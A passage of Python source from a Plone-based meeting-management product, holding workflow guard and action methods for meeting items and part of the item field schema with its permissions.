= False\n if adviceInfo['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again', ):\n res = True\n elif \"waiting_advices_given_and_signed_advices_required_to_validate\" in \\\n self.cfg.getWorkflowAdaptations():\n # check that the WF went to the last advice WF state\n # and also if advice was asked again, that last time it was asked\n # it went to the end as well\n advice_obj = self.context.getAdviceObj(adviceInfo['id'])\n # bypass if it is not a finances advice\n if advice_obj.portal_type.startswith('meetingadvicefinances'):\n # when using the advice WF with signed, the WF transition is \"signFinancialAdvice\"\n # we will get the last step signed or asked again if exist\n last_step = getLastWFAction(\n advice_obj, ['signFinancialAdvice', 'backToAdviceInitialState'])\n if not last_step or last_step['action'] != 'signFinancialAdvice':\n res = True\n return res\n\n def _hasAdvicesToGive(self, destination_state):\n \"\"\"Check if there are advice to give in p_destination_state.\"\"\"\n hasAdvicesToGive = False\n for org_uid, adviceInfo in self.context.adviceIndex.items():\n # only consider advices to give\n if not self._advice_is_to_give(adviceInfo):\n continue\n adviceStates = self.cfg.getItemAdviceStatesForOrg(org_uid)\n if destination_state in adviceStates:\n hasAdvicesToGive = True\n break\n return hasAdvicesToGive\n\n security.declarePublic('mayWait_advices')\n\n def mayWait_advices(self, from_state, destination_state):\n \"\"\" \"\"\"\n # when using the 'waiting_advices_from_XXX' WFAdaptation\n # either from last_level, or from every levels\n # only last validation level may ask advices\n res = False\n # bypass for Manager\n if _checkPermission(ManagePortal, self.context):\n res = True\n elif _checkPermission(ReviewPortalContent, self.context):\n msg = self._check_required_data(destination_state)\n if msg is not None:\n res = msg\n else:\n wfas = self.cfg.getWorkflowAdaptations()\n from_states = []\n if 'waiting_advices' in wfas:\n if 'waiting_advices_from_last_val_level' in wfas:\n from_states.append(self._getLastValidationState())\n if 'waiting_advices_from_before_last_val_level' in wfas:\n from_states.append(self._getLastValidationState(before_last=True))\n if 'waiting_advices_from_every_val_levels' in wfas:\n item_validation_states = self.cfg.getItemWFValidationLevels(\n data='state', only_enabled=True)\n from_states = list(item_validation_states)\n if not from_states:\n # use custom values from WAITING_ADVICES_FROM_STATES\n for waiting_advice_config in get_waiting_advices_infos(self.cfg.getId()):\n from_states += list(waiting_advice_config['from_states'])\n if from_state in from_states:\n res = True\n if res and not self._hasAdvicesToGive(destination_state):\n # check if there are advices to give in destination state\n res = No(_('advice_required_to_ask_advices'))\n return res\n\n security.declarePublic('mayAccept_out_of_meeting')\n\n def mayAccept_out_of_meeting(self):\n \"\"\" \"\"\"\n res = False\n if self.context.getIsAcceptableOutOfMeeting():\n if _checkPermission(ReviewPortalContent, self.context) and self.tool.isManager(self.cfg):\n res = True\n return res\n\n security.declarePublic('mayAccept_out_of_meeting_emergency')\n\n def mayAccept_out_of_meeting_emergency(self):\n \"\"\" \"\"\"\n res = False\n if self.context.getIsAcceptableOutOfMeeting() and \\\n _checkPermission(ReviewPortalContent, self.context) and \\\n self.tool.isManager(self.cfg):\n emergency = self.context.getEmergency()\n if emergency == 'emergency_accepted':\n res = True\n # if at least emergency is asked, then return a No message\n elif emergency != 'no_emergency':\n res = No(_('emergency_accepted_required_to_accept_out_of_meeting_emergency'))\n return res\n\n security.declarePublic('mayTransfer')\n\n def mayTransfer(self):\n \"\"\" \"\"\"\n return self.context.adapted().mayTransfer()\n\n\nInitializeClass(MeetingItemWorkflowConditions)\n\n\nclass MeetingItemWorkflowActions(object):\n '''Adapts a meeting item to interface IMeetingItemWorkflowActions.'''\n implements(IMeetingItemWorkflowActions)\n security = ClassSecurityInfo()\n\n def __init__(self, item):\n self.context = item\n self.tool = api.portal.get_tool('portal_plonemeeting')\n self.cfg = self.tool.getMeetingConfig(self.context)\n\n def _getCustomActionName(self, transitionId):\n \"\"\" \"\"\"\n action = None\n if transitionId in self.cfg.getItemWFValidationLevels(\n data='leading_transition', only_enabled=True):\n action = 'doProposeToNextValidationLevel'\n elif transitionId.startswith('wait_advices_from'):\n action = 'doWait_advices_from'\n elif transitionId.startswith('goTo_returned_to_proposing_group'):\n action = 'doGoTo_returned_to_proposing_group'\n return action\n\n security.declarePrivate('doActivate')\n\n def doActivate(self, stateChange):\n \"\"\"Used for items in config.\"\"\"\n pass\n\n security.declarePrivate('doDeactivate')\n\n def doDeactivate(self, stateChange):\n \"\"\"Used for items in config.\"\"\"\n pass\n\n security.declarePrivate('doProposeToNextValidationLevel')\n\n def doProposeToNextValidationLevel(self, stateChange):\n \"\"\"Called by every item validation level defined\n in MeetingConfig.itemWFValidationLevels.\"\"\"\n pass\n\n security.declarePrivate('doValidate')\n\n def doValidate(self, stateChange):\n # If it is a \"late\" item, we must potentially send a mail to warn MeetingManagers.\n preferredMeetingUID = self.context.getPreferredMeeting()\n if preferredMeetingUID != ITEM_NO_PREFERRED_MEETING_VALUE:\n meeting = uuidToObject(preferredMeetingUID)\n if meeting and self.context.wfConditions().isLateFor(meeting):\n return sendMailIfRelevant(\n self.context, 'lateItem', 'meetingmanagers', isSuffix=True)\n\n def _forceInsertNormal(self):\n \"\"\" \"\"\"\n return bool(self.context.REQUEST.cookies.get('pmForceInsertNormal', 'false') == 'true')\n\n security.declarePrivate('doPresent')\n\n def doPresent(self, stateChange):\n '''Presents an item into a meeting.'''\n meeting = getCurrentMeetingObject(self.context)\n # if we were not on a meeting view, we will present\n # the item in the next available meeting\n if not meeting:\n # find meetings accepting items in the future\n meeting = self.context.getMeetingToInsertIntoWhenNoCurrentMeetingObject()\n # insert the item into the meeting\n self._insertItem(meeting)\n # We may have to send a mail.\n sendMailIfRelevant(self.context, 'itemPresented', 'creators', isSuffix=True)\n sendMailIfRelevant(self.context, 'itemPresentedOwner', 'Owner', isRole=True)\n\n def _insertItem(self, meeting):\n \"\"\" \"\"\"\n self.context.REQUEST.set('currentlyInsertedItem', self.context)\n meeting.insert_item(self.context, force_normal=self._forceInsertNormal())\n # If the meeting is already in a late state and this item is a \"late\" item,\n # I must set automatically the item to the first \"late state\" (itemfrozen by default).\n if meeting.is_late():\n do_transitions(self.context, self._latePresentedItemTransitions())\n\n def _latePresentedItemTransitions(self):\n \"\"\"Return the transitions to execute on a late item.\n By default, this will freeze, publish or decide the item.\"\"\"\n # can can not base this on MeetingConfig.onMeetingTransitionItemActionToExecute\n # because sometimes for performance reasons, freezing items when\n # freezing the meeting is disabled but we want a late item to be auto frozen...\n return ('itemfreeze', 'itempublish', 'itemdecide')\n\n security.declarePrivate('doItemFreeze')\n\n def doItemFreeze(self, stateChange):\n pass\n\n security.declarePrivate('doItemPublish')\n\n def doItemPublish(self, stateChange):\n pass\n\n security.declarePrivate('doItemDecide')\n\n def doItemDecide(self, stateChange):\n pass\n\n security.declarePrivate('doAccept_out_of_meeting')\n\n def doAccept_out_of_meeting(self, stateChange):\n \"\"\"Duplicate item to validated if WFAdaptation\n 'accepted_out_of_meeting_and_duplicated' is used.\"\"\"\n if 'accepted_out_of_meeting_and_duplicated' in self.cfg.getWorkflowAdaptations():\n new_item = self._duplicateAndValidate(\n cloneEventAction='create_from_accepted_out_of_meeting')\n # make sure new_item is no more isAcceptableOutOfMeeting\n # when auto duplicated, new item is supposed to be presented in a next meeting\n new_item.setIsAcceptableOutOfMeeting(False)\n self.context.update_item_reference()\n\n security.declarePrivate('doAccept_out_of_meeting_emergency')\n\n def doAccept_out_of_meeting_emergency(self, stateChange):\n \"\"\"Duplicate item to validated if WFAdaptation\n 'accepted_out_of_meeting_emergency_and_duplicated' is used.\"\"\"\n if 'accepted_out_of_meeting_emergency_and_duplicated' in self.cfg.getWorkflowAdaptations():\n new_item = self._duplicateAndValidate(\n cloneEventAction='create_from_accepted_out_of_meeting_emergency')\n # make sure new_item is no more isAcceptableOutOfMeeting\n # when auto duplicated, new item is supposed to be presented in a next meeting\n new_item.setIsAcceptableOutOfMeeting(False)\n\n self.context.update_item_reference()\n\n security.declarePrivate('doTransfer')\n\n def doTransfer(self, stateChange):\n \"\"\"Duplicate item to validated if WFAdaptation\n 'transfered_and_duplicated' is used.\"\"\"\n if 'transfered_and_duplicated' in self.cfg.getWorkflowAdaptations():\n self._duplicateAndValidate(cloneEventAction='create_from_transfered')\n self.context.update_item_reference()\n\n security.declarePrivate('doAccept')\n\n def doAccept(self, stateChange):\n pass\n\n security.declarePrivate('doRefuse')\n\n def doRefuse(self, stateChange):\n pass\n\n security.declarePrivate('doMark_not_applicable')\n\n def doMark_not_applicable(self, stateChange):\n pass\n\n security.declarePrivate('doRemove')\n\n def doRemove(self, stateChange):\n # duplicate item if necessary\n if 'removed_and_duplicated' in self.cfg.getWorkflowAdaptations():\n creator = self.context.Creator()\n # We create a copy in the initial item state, in the folder of creator.\n self.context.clone(copyAnnexes=True,\n newOwnerId=creator,\n cloneEventAction='create_from_removed_item',\n keepProposingGroup=True,\n setCurrentAsPredecessor=True)\n\n def _duplicateAndValidate(self, cloneEventAction):\n \"\"\"Duplicate and keep link self.context and validate the new item.\"\"\"\n creator = self.context.Creator()\n # We create a copy in the initial item state, in the folder of creator.\n clonedItem = self.context.clone(copyAnnexes=True,\n newOwnerId=creator,\n cloneEventAction=cloneEventAction,\n keepProposingGroup=True,\n setCurrentAsPredecessor=True,\n inheritAdvices=True)\n # set clonedItem to state 'validated'\n wfTool = api.portal.get_tool('portal_workflow')\n wf_comment = _('wf_transition_triggered_by_application')\n with api.env.adopt_roles(roles=['Manager']):\n # trigger transitions until 'validated', aka one step before 'presented'\n # set a special value in the REQUEST so guards may use it if necessary\n self.context.REQUEST.set('duplicating_and_validating_item', True)\n # try to bypass by using the \"validate\" shortcut\n if \"validate\" in get_transitions(clonedItem):\n wfTool.doActionFor(clonedItem, \"validate\")\n else:\n for tr in self.cfg.getTransitionsForPresentingAnItem(\n org_uid=clonedItem.getProposingGroup())[0:-1]:\n if tr in get_transitions(clonedItem):\n wfTool.doActionFor(clonedItem, tr, comment=wf_comment)\n self.context.REQUEST.set('duplicating_and_validating_item', False)\n return clonedItem\n\n security.declarePrivate('doPostpone_next_meeting')\n\n def doPostpone_next_meeting(self, stateChange):\n '''When an item is 'postponed_next_meeting', we will duplicate it:\n the copy is automatically validated and will be linked to this one.'''\n clonedItem = self._duplicateAndValidate(cloneEventAction='create_from_postponed_next_meeting')\n # Send, if configured, a mail to the person who created the item\n sendMailIfRelevant(clonedItem, 'itemPostponedNextMeeting', 'creators', isSuffix=True)\n\n security.declarePrivate('doDelay')\n\n def doDelay(self, stateChange):\n '''When an item is delayed, we will duplicate it: the copy is back to\n the initial state and will be linked to this one.'''\n creator = self.context.Creator()\n # We create a copy in the initial item state, in the folder of creator.\n clonedItem = self.context.clone(copyAnnexes=True,\n newOwnerId=creator,\n cloneEventAction='create_from_predecessor',\n keepProposingGroup=True,\n setCurrentAsPredecessor=True)\n # Send, if configured, a mail to the person who created the item\n sendMailIfRelevant(clonedItem, 'itemDelayed', 'creators', isSuffix=True)\n sendMailIfRelevant(clonedItem, 'itemDelayedOwner', 'Owner', isRole=True)\n\n def _get_item_states_removed_from_meeting(self):\n '''Return item states in which an item is considered removed from a meeting.\n By default, when using MeetingConfig.itemWFValidationStates, these are\n the states in which item is no more linked to a meeting.'''\n res = self.cfg.getItemWFValidationLevels(data='state', only_enabled=True)\n res.append('validated')\n return res\n\n security.declarePrivate('doCorrect')\n\n def doCorrect(self, stateChange):\n \"\"\"\n This is an unique wf action called for every transitions beginning with 'backTo'.\n Most of times we do nothing, but in some case, we check the old/new state and\n do some specific treatment.\n \"\"\"\n meeting = self.context.getMeeting()\n # Remove item from meeting if necessary when going to a state\n # where item is not linked to a meeting\n if meeting and stateChange.new_state.id in self._get_item_states_removed_from_meeting():\n # We may have to send a mail\n sendMailIfRelevant(self.context, 'itemUnpresented', 'creators', isSuffix=True)\n sendMailIfRelevant(self.context, 'itemUnpresentedOwner', 'Owner', isRole=True)\n # remove the item from the meeting\n self.context.getMeeting().remove_item(self.context)\n # back to validated from \"accepted_out_of_meeting\"\n if stateChange.new_state.id == \"validated\" and self.context.getItemReference():\n self.context.update_item_reference(clear=True)\n # if an item was returned to proposing group for corrections and that\n # this proposing group sends the item back to the meeting managers, we\n # send an email to warn the MeetingManagers if relevant\n if stateChange.old_state.id.startswith(\"returned_to_proposing_group\"):\n # We may have to send a mail.\n sendMailIfRelevant(self.context, 'returnedToMeetingManagers', 'meetingmanagers', isSuffix=True)\n\n if 'decide_item_when_back_to_meeting_from_returned_to_proposing_group' in self.cfg.getWorkflowAdaptations() \\\n and stateChange.transition.getId() == 'backTo_itemfrozen_from_returned_to_proposing_group' \\\n and self.context.getMeeting().query_state() == 'decided':\n with api.env.adopt_roles(roles=['Manager']):\n wTool = api.portal.get_tool('portal_workflow')\n from config import ITEM_TRANSITION_WHEN_RETURNED_FROM_PROPOSING_GROUP_AFTER_CORRECTION\n wf_comment = _('wf_transition_triggered_by_application')\n if 'no_publication' not in self.cfg.getWorkflowAdaptations():\n wTool.doActionFor(self.context, 'itempublish', comment=wf_comment)\n wTool.doActionFor(self.context,\n ITEM_TRANSITION_WHEN_RETURNED_FROM_PROPOSING_GROUP_AFTER_CORRECTION,\n comment=wf_comment)\n\n security.declarePrivate('doReturn_to_proposing_group')\n\n def doReturn_to_proposing_group(self, stateChange):\n '''Send an email when returned to proposing group if relevant...'''\n sendMailIfRelevant(self.context, 'returnedToProposingGroup', 'creators', isSuffix=True)\n sendMailIfRelevant(self.context, 'returnedToProposingGroupOwner', 'Owner', isRole=True)\n\n security.declarePrivate('doGoTo_returned_to_proposing_group_proposed')\n\n def doGoTo_returned_to_proposing_group_proposed(self, stateChange):\n pass\n\n security.declarePrivate('doGoTo_returned_to_proposing_group')\n\n def doGoTo_returned_to_proposing_group(self, stateChange):\n pass\n\n security.declarePrivate('doWait_advices_from')\n\n def doWait_advices_from(self, stateChange):\n pass\n\n security.declarePrivate('doAccept_but_modify')\n\n def doAccept_but_modify(self, stateChange):\n pass\n\n security.declarePrivate('doPre_accept')\n\n def doPre_accept(self, stateChange):\n pass\n\n\nInitializeClass(MeetingItemWorkflowActions)\n\nschema = Schema((\n\n IntegerField(\n name='itemNumber',\n widget=IntegerField._properties['widget'](\n visible=False,\n label='Itemnumber',\n label_msgid='PloneMeeting_label_itemNumber',\n i18n_domain='PloneMeeting',\n ),\n ),\n StringField(\n name='itemReference',\n widget=StringWidget(\n visible=False,\n label='Itemreference',\n label_msgid='PloneMeeting_label_itemReference',\n i18n_domain='PloneMeeting',\n ),\n searchable=True,\n ),\n TextField(\n name='description',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_label_itemDescription\",\n label='Description',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n accessor=\"Description\",\n optional=True,\n ),\n TextField(\n name='detailedDescription',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('detailedDescription')\",\n label='Detaileddescription',\n label_msgid='PloneMeeting_label_detailedDescription',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n default_output_type=\"text/x-html-safe\",\n optional=True,\n ),\n BooleanField(\n name='budgetRelated',\n widget=BooleanField._properties['widget'](\n condition=\"python: here.show_budget_infos()\",\n description=\"BudgetRelated\",\n description_msgid=\"item_budget_related_descr\",\n label='Budgetrelated',\n label_msgid='PloneMeeting_label_budgetRelated',\n i18n_domain='PloneMeeting',\n ),\n read_permission=ReadBudgetInfos,\n write_permission=WriteBudgetInfos,\n ),\n TextField(\n name='budgetInfos',\n widget=RichWidget(\n condition=\"python: here.show_budget_infos()\",\n description=\"BudgetInfos\",\n description_msgid=\"item_budgetinfos_descr\",\n label='Budgetinfos',\n label_msgid='PloneMeeting_label_budgetInfos',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n allowable_content_types=('text/html',),\n searchable=True,\n default_method=\"getDefaultBudgetInfo\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n read_permission=ReadBudgetInfos,\n write_permission=WriteBudgetInfos,\n ),\n StringField(\n name='proposingGroup',\n widget=SelectionWidget(\n condition=\"python: not here.attribute_is_used('proposingGroupWithGroupInCharge')\",\n format=\"select\",\n label='Proposinggroup',\n label_msgid='PloneMeeting_label_proposingGroup',\n i18n_domain='PloneMeeting',\n ),\n vocabulary_factory='Products.PloneMeeting.vocabularies.userproposinggroupsvocabulary',\n enforceVocabulary=True,\n ),\n StringField(\n name='proposingGroupWithGroupInCharge',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('proposingGroupWithGroupInCharge')\",\n format=\"select\",\n label='Proposinggroupwithgroupincharge',\n label_msgid='PloneMeeting_label_proposingGroupWithGroupInCharge',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.userproposinggroupswithgroupsinchargevocabulary',\n enforceVocabulary=True,\n ),\n LinesField(\n name='groupsInCharge',\n widget=MultiSelectionWidget(\n condition=\"python: here.show_groups_in_charge()\",\n size=10,\n description=\"Groupsincharge\",\n description_msgid=\"item_groups_in_charge_descr\",\n format=\"checkbox\",\n label='Groupsincharge',\n label_msgid='PloneMeeting_label_groupsInCharge',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemgroupsinchargevocabulary',\n enforceVocabulary=True,\n ),\n LinesField(\n name='associatedGroups',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('associatedGroups')\",\n size=10,\n description=\"AssociatedGroupItem\",\n description_msgid=\"associated_group_item_descr\",\n format=\"checkbox\",\n label='Associatedgroups',\n label_msgid='PloneMeeting_label_associatedGroups',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemassociatedgroupsvocabulary',\n enforceVocabulary=True,\n ),\n StringField(\n name='category',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('category')\",\n format=\"select\",\n description=\"Category\",\n description_msgid=\"item_category_descr\",\n label='Category',\n label_msgid='PloneMeeting_label_category',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listCategories',\n ),\n StringField(\n name='classifier',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('classifier')\",\n format=\"select\",\n description=\"Classifier\",\n description_msgid=\"item_classifier_descr\",\n label='Classifier',\n label_msgid='PloneMeeting_label_classifier',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listClassifiers',\n ),\n LinesField(\n name='committees',\n widget=MultiSelectionWidget(\n condition=\"python: here.show_committees()\",\n size=10,\n format=\"checkbox\",\n label='Committees',\n label_msgid='PloneMeeting_label_committees',\n i18n_domain='PloneMeeting',\n ),\n optional=False,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.item_selectable_committees_vocabulary',\n enforceVocabulary=True,\n ),\n StringField(\n name='listType',\n default='normal',\n widget=SelectionWidget(\n visible=True,\n condition=\"python: here.adapted().mayChangeListType()\",\n label='Listtype',\n label_msgid='PloneMeeting_label_listType',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.listtypesvocabulary'\n ),\n StringField(\n name='emergency',\n default='no_emergency',\n widget=SelectionWidget(\n condition=\"python: here.showEmergency()\",\n description=\"Emergency\",\n description_msgid=\"item_emergency_descr\",\n visible=False,\n label='Emergency',\n label_msgid='PloneMeeting_label_emergency',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listEmergencies',\n ),\n StringField(\n name='preferredMeeting',\n default=ITEM_NO_PREFERRED_MEETING_VALUE,\n widget=SelectionWidget(\n condition=\"python: not here.isDefinedInTool()\",\n description=\"PreferredMeeting\",\n description_msgid=\"preferred_meeting_descr\",\n label='Preferredmeeting',\n label_msgid='PloneMeeting_label_preferredMeeting',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n vocabulary='listMeetingsAcceptingItems',\n ),\n DateTimeField(\n name='meetingDeadlineDate',\n widget=DateTimeField._properties['widget'](\n condition=\"python: here.attribute_is_used('meetingDeadlineDate') and not here.isDefinedInTool()\",\n description=\"MeetingDeadlineDate\",\n description_msgid=\"meeting_deadline_date_descr\",\n label='Meetingdeadlinedate',\n label_msgid='PloneMeeting_label_meetingDeadlineDate',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n LinesField(\n name='itemTags',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('itemTags')\",\n format=\"checkbox\",\n label='Itemtags',\n label_msgid='PloneMeeting_label_itemTags',\n i18n_domain='PloneMeeting',\n ),\n multiValued=1,\n vocabulary='listItemTags',\n searchable=True,\n enforceVocabulary=True,\n optional=True,\n ),\n StringField(\n name='itemKeywords',\n widget=StringField._properties['widget'](\n size=50,\n condition=\"python: here.attribute_is_used('itemKeywords')\",\n label='Itemkeywords',\n label_msgid='PloneMeeting_label_itemKeywords',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n searchable=True,\n ),\n LinesField(\n name='optionalAdvisers',\n widget=MultiSelectionWidget(\n description=\"OptionalAdvisersItem\",\n description_msgid=\"optional_advisers_item_descr\",\n condition='python:here.showOptionalAdvisers()',\n format=\"checkbox\",\n size=10,\n label='Optionaladvisers',\n label_msgid='PloneMeeting_label_optionalAdvisers',\n i18n_domain='PloneMeeting',\n ),\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemoptionaladvicesvocabulary',\n enforceVocabulary=True,\n ),\n TextField(\n name='motivation',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('motivation')\",\n label='Motivation',\n label_msgid='PloneMeeting_label_motivation',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='decision',\n widget=RichWidget(\n label='Decision',\n label_msgid='PloneMeeting_label_decision',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=False,\n write_permission=WriteDecision,\n ),\n TextField(\n name='decisionSuite',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('decisionSuite')\",\n label='DecisionSuite',\n label_msgid='PloneMeeting_label_decisionSuite',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='decisionEnd',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('decisionEnd')\",\n label='DecisionEnd',\n label_msgid='PloneMeeting_label_decisionEnd',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='votesResult',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('votesResult')\",\n label='VotesResult',\n label_msgid='PloneMeeting_label_votesResult',\n description=\"VotesResult\",\n description_msgid=\"votes_result_descr\",\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n # we use WriteMarginalNotes so MeetingManagers may edit votesResult\n # when item is decided but as field in not in\n # MeetingItem._bypass_meeting_closed_check_for it will not be quick editable\n # when the meeting is closed\n write_permission=WriteMarginalNotes,\n ),\n BooleanField(\n name='oralQuestion',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showOralQuestion()\",\n description=\"OralQuestion\",\n description_msgid=\"oral_question_item_descr\",\n label='Oralquestion',\n label_msgid='PloneMeeting_label_oralQuestion',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n BooleanField(\n name='toDiscuss',\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showToDiscuss()\",\n label='Todiscuss',\n label_msgid='PloneMeeting_label_toDiscuss',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n default_method=\"getDefaultToDiscuss\",\n ),\n LinesField(\n name='itemInitiator',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('itemInitiator')\",\n description=\"ItemInitiator\",\n description_msgid=\"item_initiator_descr\",\n format=\"checkbox\",\n label='Iteminitiator',\n label_msgid='PloneMeeting_label_itemInitiator',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n optional=True,\n multiValued=1,\n vocabulary='listItemInitiators',\n ),\n TextField(\n name='inAndOutMoves',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('inAndOutMoves')\",\n description=\"InAndOutMoves\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_inAndOutMoves\",\n label='Inandoutmoves',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='notes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('notes')\",\n description=\"Notes\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_notes\",\n label='Notes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='meetingManagersNotes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('meetingManagersNotes')\",\n description=\"MeetingManagersNotes\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_label_meetingManagersNotes\",\n label='Meetingmanagersnotes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='meetingManagersNotesSuite',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('meetingManagersNotesSuite')\",\n description=\"MeetingManagersNotesSuite\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_label_meetingManagersNotesSuite\",\n label='Meetingmanagersnotessuite',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='meetingManagersNotesEnd',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('meetingManagersNotesEnd')\",\n description=\"MeetingManagersNotesEnd\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_label_meetingManagersNotesEnd\",\n label='Meetingmanagersnotesend',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='internalNotes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n description=\"InternalNotes\",\n description_msgid=\"internal_notes_descr\",\n condition=\"python: here.attribute_is_used('internalNotes')\",\n label_msgid=\"PloneMeeting_label_internalNotes\",\n label='Internalnotes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n read_permission=WriteInternalNotes,\n write_permission=WriteInternalNotes,\n ),\n TextField(\n name='marginalNotes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n description=\"MarginalNotes\",\n description_msgid=\"marginal_notes_descr\",\n condition=\"python: here.attribute_is_used('marginalNotes')\",\n label_msgid=\"PloneMeeting_label_marginalNotes\",\n label='Marginalnotes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n searchable=True,\n optional=True,\n write_permission=WriteMarginalNotes,\n ),\n TextField(\n name='observations',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_itemObservations\",\n condition=\"python: here.adapted().showObservations()\",\n description_msgid=\"descr_field_vieawable_by_everyone\",\n label='Observations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read item observations\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n LinesField(\n name='templateUsingGroups',\n widget=MultiSelectionWidget(\n description=\"TemplateUsingGroups\",\n description_msgid=\"template_using_groups_descr\",\n condition=\"python: here.isDefinedInTool(item_type='itemtemplate')\",\n format=\"checkbox\",\n label='Templateusinggroups',\n label_msgid='PloneMeeting_label_templateUsingGroups',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='collective.contact.plonegroup.browser.settings.'\n 'SortedSelectedOrganizationsElephantVocabulary',\n ),\n StringField(\n name='meetingTransitionInsertingMe',\n widget=SelectionWidget(\n condition=\"python: here.isDefinedInTool(item_type='recurring')\",\n description=\"MeetingTransitionInsertingMe\",\n description_msgid=\"meeting_transition_inserting_me_descr\",\n label='Meetingtransitioninsertingme',\n 